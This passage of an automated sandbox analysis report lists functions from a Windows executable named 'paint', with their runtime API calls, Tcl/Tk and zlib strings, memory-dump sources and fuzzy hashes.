Instruction Fuzzy Hash: 9A218E32A047829AEB248F64C4442FC33A4EB05718F845635DA2E86BD5EF79D588C740

Function 00007FF6F0BE6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE5F69

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 844259b4545c7f2faf098c225a1584e00bf7d74b7241a3aa4d9de9a85b274a03
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: BD116322A1C64291EF609F5194201BEA3A4AF47B80FD540B1EB5ED7BD6EF7EE5408780

Function 00007FF6F0BF63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF63E7

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 12ece5c7f8db83eeb07587a4dcfa2cbaac6729c9bdb9b5f23357cf0042e842c9
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: F221F972618A4297D7619F58D44037972A4FB86B55F944234EAAFC77D9EF3ED8008B00

Function 00007FF6F0BE042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE0480

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: ef6cb37b68703d6a30644634edae043bd8c9d68e9b5b450b3a4cf76554f29de3
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 8201C461A1874250EB04DF529E01069A6B5BF97FE0F884671EF7D97BDAEE3EE1814300

Function 00007FF6F0BE7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE7FAA

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: 46cc1951033f4a8727cccfa4dbc0449c9df0b6d0a22c5cd1a98e075c345be1b4
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: BF01FC20E1D6C360FF70AB65A50017862A0AF067A0FC446B5EA3FC2BC6FF3EE4518241

Function 00007FF6F0BE82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE82C1

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: f51b5e2f2193b6b21382ae814d6f8364da8841245741e9bdab4bb463dd81fda0
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 59E0ECA0E18A07A6F7143AA4458617D12115F97740FC145B0EA2EA63C3FE2E68495621

Function 00007FF6F0BED66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6F0BE0D00,?,?,?,00007FF6F0BE236A,?,?,?,?,?,00007FF6F0BE3B59), ref: 00007FF6F0BED6AA

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: d6683fa3ae1bdfc8c4d2a37fa4b6c07706ba87b9afd52ff45121e21a8bf76aef
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: A1F05804F09303B8FF6467A1590167812904F96BA0F880370DD3FCB3C6FEAEA4808210

Non-executed Functions

Function 00007FF6F0BD76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6F0BD76C7
GetLastError.KERNEL32 ref: 00007FF6F0BD76D9
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7715
GetLastError.KERNEL32 ref: 00007FF6F0BD7727
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7740
GetLastError.KERNEL32 ref: 00007FF6F0BD7752
GetProcAddress.KERNEL32 ref: 00007FF6F0BD776B
GetLastError.KERNEL32 ref: 00007FF6F0BD777D
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7799
GetLastError.KERNEL32 ref: 00007FF6F0BD77AB
GetProcAddress.KERNEL32 ref: 00007FF6F0BD77C7
GetLastError.KERNEL32 ref: 00007FF6F0BD77D9
GetProcAddress.KERNEL32 ref: 00007FF6F0BD77F5
GetLastError.KERNEL32 ref: 00007FF6F0BD7807
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7823
GetLastError.KERNEL32 ref: 00007FF6F0BD7835
GetProcAddress.KERNEL32 ref: 00007FF6F0BD7851
GetLastError.KERNEL32 ref: 00007FF6F0BD7863

Strings

Tcl_NewByteArrayObj, xrefs: 00007FF6F0BD7AF9, 00007FF6F0BD7B1B
Tcl_GetString, xrefs: 00007FF6F0BD7A9D, 00007FF6F0BD7ABF
Tcl_ConditionFinalize, xrefs: 00007FF6F0BD792D, 00007FF6F0BD794F
Tk_GetNumMainWindows, xrefs: 00007FF6F0BD7C97, 00007FF6F0BD7CB9
Tk_Init, xrefs: 00007FF6F0BD7C69, 00007FF6F0BD7C8B
Tcl_ThreadQueueEvent, xrefs: 00007FF6F0BD79B7, 00007FF6F0BD79D9
Tcl_Free, xrefs: 00007FF6F0BD7C3B, 00007FF6F0BD7C5D
Tcl_EvalFile, xrefs: 00007FF6F0BD7B83, 00007FF6F0BD7BA5
Tcl_FindExecutable, xrefs: 00007FF6F0BD7736, 00007FF6F0BD7758
Tcl_DeleteInterp, xrefs: 00007FF6F0BD77EB, 00007FF6F0BD780D
Tcl_CreateInterp, xrefs: 00007FF6F0BD770B, 00007FF6F0BD772D
Tcl_GetVar2, xrefs: 00007FF6F0BD7A13, 00007FF6F0BD7A35
Tcl_SetVar2Ex, xrefs: 00007FF6F0BD7B27, 00007FF6F0BD7B49
Tcl_EvalEx, xrefs: 00007FF6F0BD7BB1, 00007FF6F0BD7BD3
Tcl_SetVar2, xrefs: 00007FF6F0BD7A41, 00007FF6F0BD7A63
Tcl_ThreadAlert, xrefs: 00007FF6F0BD79E5, 00007FF6F0BD7A07
Tcl_FinalizeThread, xrefs: 00007FF6F0BD77BD, 00007FF6F0BD77DF
Tcl_ConditionNotify, xrefs: 00007FF6F0BD795B, 00007FF6F0BD797D
Tcl_MutexFinalize, xrefs: 00007FF6F0BD78FF, 00007FF6F0BD7921
Tcl_JoinThread, xrefs: 00007FF6F0BD7875, 00007FF6F0BD7897
Tcl_NewStringObj, xrefs: 00007FF6F0BD7ACB, 00007FF6F0BD7AED
Failed to get address for %hs, xrefs: 00007FF6F0BD76E8
Tcl_CreateThread, xrefs: 00007FF6F0BD7819, 00007FF6F0BD783B
Tcl_GetObjResult, xrefs: 00007FF6F0BD7B55, 00007FF6F0BD7B77
Tcl_Init, xrefs: 00007FF6F0BD76C0, 00007FF6F0BD76DF
Tcl_Finalize, xrefs: 00007FF6F0BD778F, 00007FF6F0BD77B1
Tcl_ConditionWait, xrefs: 00007FF6F0BD7989, 00007FF6F0BD79AB
Tcl_MutexUnlock, xrefs: 00007FF6F0BD78D1, 00007FF6F0BD78F3
Tcl_CreateObjCommand, xrefs: 00007FF6F0BD7A6F, 00007FF6F0BD7A91
Tcl_GetCurrentThread, xrefs: 00007FF6F0BD7847, 00007FF6F0BD7869
Tcl_DoOneEvent, xrefs: 00007FF6F0BD7761, 00007FF6F0BD7783
Tcl_EvalObjv, xrefs: 00007FF6F0BD7BDF, 00007FF6F0BD7C01
GetProcAddress, xrefs: 00007FF6F0BD76EF
Tcl_MutexLock, xrefs: 00007FF6F0BD78A3, 00007FF6F0BD78C5
Tcl_Alloc, xrefs: 00007FF6F0BD7C0D, 00007FF6F0BD7C2F

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 4fd2aeea368b7a09fe89871dc722961a3d320f6b18d8b93d5c687a3f982faa66
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 1C02B728A4EB07F0EB149BA5A8149B5636AAF06756FC44035D83FC33E0FF3EB5499250

Function 00007FF6F0BF411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6F0BF416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF47D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF4C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF4E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF5067
memcpy_s.LIBCPMT ref: 00007FF6F0BF5142
memcpy_s.LIBCPMT ref: 00007FF6F0BF51ED
memcpy_s.LIBCPMT ref: 00007FF6F0BF52BC

Strings

1#SNAN, xrefs: 00007FF6F0BF427A
1#QNAN, xrefs: 00007FF6F0BF4283
1#IND, xrefs: 00007FF6F0BF4257
1#INF, xrefs: 00007FF6F0BF4293

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: e0428a7e66b7eb446a04b2a1b1b058370c5a39485da596e8ba2003185c70bbbc
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: DAB2E776A182829BE7248FA4D4407FD77A9FB56385F805135DA2F97BC4EF39A900CB40

Function 00007FF6F0BDAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid bit length repeat, xrefs: 00007FF6F0BDB109
too many length or distance symbols, xrefs: 00007FF6F0BDAEB6
invalid distance code, xrefs: 00007FF6F0BDB624
invalid literal/lengths set, xrefs: 00007FF6F0BDB1A3
invalid distances set, xrefs: 00007FF6F0BDB210
invalid code -- missing end-of-block, xrefs: 00007FF6F0BDB136
invalid distance too far back, xrefs: 00007FF6F0BDB6E0
invalid literal/length code, xrefs: 00007FF6F0BDB452
invalid code lengths set, xrefs: 00007FF6F0BDAE9D

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 7e88066dd6b38d794819ff5c7d4bf54ccbba79fa809ddd669e283a39f9b3356a
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 32520672A156A69BD7948F14C458B7EBBAAFB45340F414139E66AC37C0EF3ED844CB40

Function 00007FF6F0BDD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6F0BDD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF6F0BDD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F0BDD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F0BDD240
IsDebuggerPresent.KERNEL32 ref: 00007FF6F0BDD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BDD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BDD2BC

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: de53b9290878e02cf0887852d066492c2e9152245b0fbf26231cc6f60dc635df
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 9B317E76609B81D6EB608FA0E8807EE7365FB85705F84403ADA5E87B94EF3DC648C710

Function 00007FF6F0BF5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BF5CB5

Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C

Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

Part of subcall function 00007FF6F0BEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA979
Part of subcall function 00007FF6F0BEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA99E

_get_daylight.LIBCMT ref: 00007FF6F0BF5CA4

Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
_get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
_get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 69cd1c9e8cec580f86320ee8c94abef9dfe5dd09a0da2057a5d6ddb0f22e9c31
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 65D1D03AA0820266EB20AF61D8411B96769EF56795FC08035EE2EC77D6FF3EE4418340

Function 00007FF6F0BEA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6F0BEA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F0BEA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F0BEA750
IsDebuggerPresent.KERNEL32 ref: 00007FF6F0BEA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BEA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BEA79E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 10fd3377e37dac6840fb044f10ffcec09820b9b6a7ea783e8badb70e996898b2
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: E4319136608B8196DB20CF64E8406AE77A8FB89754F940135EAAE83B95EF3DD545CB00

Function 00007FF6F0BF18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF1930
FindFirstFileExW.KERNEL32 ref: 00007FF6F0BF1A3A

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 567ee392d49fde37cac01364b964fff3282d152b8466d7495051d4ecaa150321
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 54B1D52AB1868291EB61DBA1D4101B96398EB46BE5FC45931EE6F87BC5FF3DE441C300

Function 00007FF6F0BF5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BF5F1A

Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F2B

Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F3C

Part of subcall function 00007FF6F0BF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF564C

